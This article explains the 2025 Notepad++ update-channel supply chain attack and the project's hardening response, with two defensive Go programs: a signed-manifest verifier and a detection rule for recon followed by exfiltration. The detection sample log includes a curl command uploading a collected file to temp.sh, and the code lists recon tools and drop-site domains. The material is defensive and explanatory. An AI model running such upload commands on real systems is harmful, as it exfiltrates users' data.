In 2025, the popular text editor Notepad++ became the target of a sophisticated software supply chain attack. Attackers did not breach the application’s source code. Instead, they compromised the infrastructure of a former hosting provider for notepad-plus-plus.org and abused the update delivery mechanism to distribute malicious installers to selected users. On 2 February 2026, Notepad++ developer Don Ho publicly confirmed the scope and nature of this incident following an internal investigation.
How the Notepad++ supply chain attack unfolded
According to the published findings, malicious activity began around June 2025 and remained undetected until December. The attackers focused on the update channel rather than the Notepad++ codebase itself, demonstrating a classic software supply chain compromise: instead of attacking the product directly, they exploited its surrounding infrastructure.
The threat actors intercepted HTTP requests from the built-in updater and selectively redirected some of this traffic to attacker-controlled servers. There, victims were served forged update manifests that pointed to trojanized Notepad++ installers. Because the substitution affected only a subset of users, the operation generated minimal noise and significantly delayed detection.
The malware delivered via these fake updates performed limited but precise initial reconnaissance. On infected Windows systems it executed standard commands such as netstat, systeminfo, tasklist and whoami to collect network details, OS configuration, running processes and the current user context. The results were stored in a file and exfiltrated via curl to the temporary file-hosting service temp[.]sh. This lightweight toolset is typical for the first stage of targeted intrusions, allowing attackers to assess the strategic value of compromised machines before deploying additional payloads.
Compromised hosting infrastructure and timeline of the attack
The former hosting provider reported that the server hosting the Notepad++ update mechanism had been compromised before 2 September 2025. On that date, the provider performed scheduled maintenance, including kernel and firmware updates. After this intervention, suspicious direct access patterns to the server disappeared from the logs, suggesting that the attackers lost their initial foothold on the machine itself.
However, the incident report indicates that the adversaries maintained access to internal hosting infrastructure services until 2 December 2025. This residual access was sufficient to continue selective redirection of requests to /update/getDownloadUrl.php towards their own servers, injecting malicious URLs into the update process. Log data showed no evidence of similar activity against other customers on the same platform, underscoring that notepad-plus-plus.org and its update endpoint were the primary targets.
Incident response specialists estimate that the practical exploitation phase likely ended around 10 November 2025, although some dates in the provider’s and developer’s records do not fully align. The investigation therefore treats the period between June and December 2025 as the overall window of infrastructure compromise.
Possible link to Chinese state-sponsored APT actors
Several independent cybersecurity experts have assessed with high confidence that the operation is consistent with the activity of a Chinese state-aligned Advanced Persistent Threat (APT). The attribution is based on multiple factors: the highly targeted nature of the campaign, the low operational noise achieved by tampering with only a portion of updates, and the profile of affected organizations, some of which reportedly maintain business interests in East Asia.
Strategic supply chain operations of this type align with known tactics of government-backed APT groups, which frequently leverage trusted software updates to gain covert, long-term access to selected networks. Previous high-impact cases, such as the SolarWinds Orion compromise and the CCleaner incident, have shown that abusing software distribution channels can bypass traditional perimeter defenses and endpoint controls. Public threat landscape reports from agencies such as ENISA and CISA consistently rank supply chain attacks among the most difficult-to-detect intrusion vectors because users inherently trust updates from well-known vendors.
Notepad++ security response and hardening of the update mechanism
After receiving the first user reports of suspicious updates in late 2025, the Notepad++ team moved quickly to reinforce its update infrastructure. In November 2025, Notepad++ 8.8.8 was released, changing the update download source to GitHub exclusively. This reduced the attack surface on the hosting provider’s side and ensured that updates were fetched from a more tightly controlled distribution platform.
On 9 December 2025, version 8.8.9 introduced stricter integrity and authenticity checks. The integrated updater component WinGup began validating both the digital signature of the installer and the publisher certificate. In parallel, the update server started signing its XML responses using XMLDSig (XML Digital Signatures). This step ensures that not only the executable, but also the metadata that directs the update process, is protected against tampering.
The Notepad++ website was migrated to a new hosting provider with enhanced security controls and revised operational procedures. A further release, version 8.9.2, is expected to make signature and certificate verification mandatory and non-bypassable for all updates. Until then, the project maintainer recommends that users manually download and install version 8.9.1, which already incorporates the critical security improvements.
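The hardening steps described in this section (a GitHub-only download source, verification of the installer, and signed update metadata) can be illustrated as client-side checks. The Go program below is an added example written for this article, not WinGup's code or the project's real manifest schema: it uses a detached Ed25519 signature over the manifest bytes as a simplified stand-in for XMLDSig, an invented Update element layout, a constructed installer payload, and placeholder URLs (example-org, attacker.invalid). It shows why each check matters: a response whose download location was swapped in transit, as in the incident, fails signature verification, and a response that verifies but points off GitHub or at plain HTTP is still refused.

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"encoding/xml"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// Manifest is the update metadata the client receives. Element names are an
// assumption for this example, not WinGup's real schema.
type Manifest struct {
	XMLName xml.Name `xml:"Update"`
	Version string   `xml:"Version"`
	URL     string   `xml:"Location"`
	SHA256  string   `xml:"SHA256"`
}

// Download hosts the updater accepts; the page reports that 8.8.8 moved downloads to GitHub exclusively.
var allowedHosts = map[string]bool{"github.com": true}

// NewSigningKey creates the publisher key pair; only the public half ships inside the updater.
func NewSigningKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(nil) // nil selects crypto/rand
	if err != nil {
		panic(err)
	}
	return pub, priv
}

// HexSHA256 returns the lower-case hex digest used as the installer pin.
func HexSHA256(data []byte) string {
	sum := sha256.Sum256(data)
	return hex.EncodeToString(sum[:])
}

// BuildManifest serialises the metadata exactly as the server signs it.
func BuildManifest(version, location, pin string) []byte {
	raw, err := xml.Marshal(Manifest{Version: version, URL: location, SHA256: pin})
	if err != nil {
		panic(err)
	}
	return raw
}

// SignManifest makes a detached Ed25519 signature over the raw XML bytes, a
// simplified stand-in for the XMLDSig envelope the page describes.
func SignManifest(priv ed25519.PrivateKey, raw []byte) []byte {
	return ed25519.Sign(priv, raw)
}

// VerifyManifest checks, in order: the metadata is authentic, the location is an HTTPS URL on an
// allowlisted host, and an installer pin is present. A response whose Location was swapped in
// transit fails the first check; one signed with the genuine key but pointing off GitHub fails the second.
func VerifyManifest(pub ed25519.PublicKey, raw, sig []byte) (*Manifest, error) {
	if !ed25519.Verify(pub, raw, sig) {
		return nil, errors.New("manifest signature does not verify")
	}
	var m Manifest
	if err := xml.Unmarshal(raw, &m); err != nil {
		return nil, fmt.Errorf("manifest parse: %w", err)
	}
	u, err := url.Parse(m.URL)
	if err != nil || u.Scheme != "https" {
		return nil, fmt.Errorf("refusing location %q: must be a valid HTTPS URL", m.URL)
	}
	if !allowedHosts[strings.ToLower(u.Hostname())] {
		return nil, fmt.Errorf("download host %q is not allowlisted", u.Hostname())
	}
	if len(m.SHA256) != sha256.Size*2 {
		return nil, errors.New("manifest lacks a valid SHA-256 pin")
	}
	return &m, nil
}

// VerifyInstaller compares downloaded bytes with the pin carried by a verified manifest.
func VerifyInstaller(m *Manifest, data []byte) error {
	if !strings.EqualFold(HexSHA256(data), m.SHA256) {
		return errors.New("installer hash mismatch: do not execute")
	}
	return nil
}

func main() {
	pub, priv := NewSigningKey()
	installer := []byte("constructed stand-in for installer bytes")
	good := BuildManifest("8.8.9", "https://github.com/example-org/example-editor/releases/download/v8.8.9/installer.exe", HexSHA256(installer))
	sig := SignManifest(priv, good)
	if m, err := VerifyManifest(pub, good, sig); err == nil {
		fmt.Println("genuine manifest accepted; installer pin matches:", VerifyInstaller(m, installer) == nil)
	}
	// The incident's pattern: the signed response is intercepted and its Location pointed at an attacker host.
	forged := BuildManifest("8.8.9", "https://updates.attacker.invalid/installer.exe", HexSHA256(installer))
	_, err := VerifyManifest(pub, forged, sig)
	fmt.Println("forged manifest rejected:", err)
}
```

The order of the checks is the point: the hash pin is only meaningful once the manifest that carries it has been authenticated, and the host allowlist remains useful even if the signing key were ever misused. Because the signature here covers the raw bytes, the server must sign exactly what it transmits; real XMLDSig adds canonicalisation so that harmless re-serialisation does not break verification, which this stand-in deliberately omits.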
Key cybersecurity lessons for software update security
The Notepad++ incident highlights that even widely trusted and widely used tools can be turned into an attack vector when supporting infrastructure is compromised. For both organizations and individual users, the software update mechanism must be treated as a critical security component, not just a convenience feature.
To reduce exposure to similar threats, security practitioners recommend enabling and enforcing digital signature verification for updates wherever possible, and carefully managing automatic updates on high-value or mission-critical systems. Outbound traffic should be monitored for unexpected destinations, especially temporary file-sharing platforms or previously unseen domains, which are often used for discreet data exfiltration. It is also essential to track advisories and incident reports related to the software in use, so that known compromise periods can be correlated with internal logs.
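The reconnaissance-then-exfiltration pattern described earlier (netstat, systeminfo, tasklist and whoami followed by curl to temp[.]sh) and the monitoring advice in this section can be combined into a single hunt. The Go program below is an added example, not part of the article or of any vendor tooling: it runs over constructed process-creation records in a pipe-delimited layout invented here, flags a host where two or more distinct recon tools ran within an assumed 15-minute look-back before curl was pointed at a watch-listed file-hosting domain, and lets the hunt be scoped to a known compromise period such as June to December 2025. Host names, users and file paths in the sample are constructed.

```go
package main

import (
	"fmt"
	"net/url"
	"path"
	"sort"
	"strings"
	"time"
)

// Event is one process-creation record (the fields Sysmon event ID 1 or an EDR would carry).
type Event struct {
	Time                 time.Time
	Host, User, Exe, Cmd string // Exe holds only the lower-cased executable name
}

// Recon utilities and the drop site named in the incident report; the look-back window is an assumed value.
var reconTools = map[string]bool{"netstat.exe": true, "systeminfo.exe": true, "tasklist.exe": true, "whoami.exe": true}
var dropSites = map[string]bool{"temp.sh": true}
const window = 15 * time.Minute

// sampleLog is constructed telemetry in a layout invented here: RFC3339 time | host | user | image path | command line.
const sampleLog = `
2025-09-14T10:02:11Z|WS-042|CORP\jdoe|C:\Windows\System32\whoami.exe|whoami
2025-09-14T10:02:20Z|WS-042|CORP\jdoe|C:\Windows\System32\tasklist.exe|tasklist
2025-09-14T10:02:25Z|WS-042|CORP\jdoe|C:\Windows\System32\NETSTAT.EXE|netstat -ano
2025-09-14T10:03:40Z|WS-042|CORP\jdoe|C:\Windows\System32\curl.exe|curl -T C:\Users\jdoe\AppData\Local\Temp\out.txt https://temp.sh/
2025-09-14T11:15:02Z|WS-017|CORP\admin|C:\Windows\System32\tasklist.exe|tasklist /svc
2025-09-14T11:16:30Z|WS-017|CORP\admin|C:\Windows\System32\curl.exe|curl -L -o tool.zip https://github.com/example-org/tool/releases/download/v1/tool.zip
`

// ParseEvents reads the pipe-delimited records above, reducing the image path to a bare lower-case name.
func ParseEvents(log string) ([]Event, error) {
	var events []Event
	for _, line := range strings.Split(strings.TrimSpace(log), "\n") {
		f := strings.SplitN(strings.TrimSpace(line), "|", 5)
		if len(f) != 5 {
			return nil, fmt.Errorf("malformed record: %q", line)
		}
		ts, err := time.Parse(time.RFC3339, f[0])
		if err != nil {
			return nil, fmt.Errorf("bad timestamp in %q: %w", line, err)
		}
		exe := strings.ToLower(path.Base(strings.ReplaceAll(f[3], `\`, "/")))
		events = append(events, Event{ts, f[1], f[2], exe, f[4]})
	}
	return events, nil
}

// dropSiteHost returns the watch-listed host if curl was given a URL there, else "".
func dropSiteHost(e Event) string {
	if e.Exe == "curl.exe" {
		for _, tok := range strings.Fields(e.Cmd) {
			if u, err := url.Parse(tok); err == nil && strings.HasPrefix(u.Scheme, "http") && dropSites[strings.ToLower(u.Hostname())] {
				return strings.ToLower(u.Hostname())
			}
		}
	}
	return ""
}

// Alert records one recon-then-upload sequence.
type Alert struct {
	Host, User, Dest string
	At               time.Time
	Recon            []string // distinct recon tools seen in the look-back, sorted
}

// Detect flags a host where two or more distinct recon tools ran within window before curl reached a
// drop site. Uploads outside [from, to) are skipped so the hunt can be scoped to a published compromise
// period (the page gives June to December 2025); a zero time leaves that side unbounded.
func Detect(events []Event, from, to time.Time) []Alert {
	sort.Slice(events, func(i, j int) bool { return events[i].Time.Before(events[j].Time) })
	var alerts []Alert
	for i, e := range events {
		dest := dropSiteHost(e)
		if dest == "" || e.Time.Before(from) || (!to.IsZero() && !e.Time.Before(to)) {
			continue
		}
		seen := map[string]bool{}
		for j := i - 1; j >= 0 && e.Time.Sub(events[j].Time) <= window; j-- {
			if events[j].Host == e.Host && reconTools[events[j].Exe] {
				seen[events[j].Exe] = true
			}
		}
		if len(seen) >= 2 {
			recon := make([]string, 0, len(seen))
			for n := range seen {
				recon = append(recon, n)
			}
			sort.Strings(recon)
			alerts = append(alerts, Alert{e.Host, e.User, dest, e.Time, recon})
		}
	}
	return alerts
}

func main() {
	events, _ := ParseEvents(sampleLog) // constant input, cannot fail here
	fmt.Printf("%+v\n", Detect(events, time.Date(2025, 6, 1, 0, 0, 0, 0, time.UTC), time.Date(2026, 1, 1, 0, 0, 0, 0, time.UTC)))
}
```

On the sample, only WS-042 is reported: three recon tools within two minutes, then an upload to the watch-listed domain. WS-017, where an administrator ran tasklist and then fetched a release from GitHub, is not flagged because the destination is not on the drop-site list, which is where the rule gets its precision. In practice the list should be fed from threat intelligence and the look-back tuned to the environment; requiring at least two distinct recon tools keeps a lone whoami from paging anyone.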
On the vendor side, the case underlines the need for robust supplier and hosting security, including regular security audits, comprehensive logging, strict access controls to internal management systems and well-tested incident response processes. As global experience with SolarWinds, CCleaner and now Notepad++ shows, supply chain resilience is a shared responsibility across developers, service providers and end users. The more rigorously organizations authenticate updates and monitor for anomalous network behavior, the harder it becomes for attackers to execute silent, targeted supply chain operations at scale.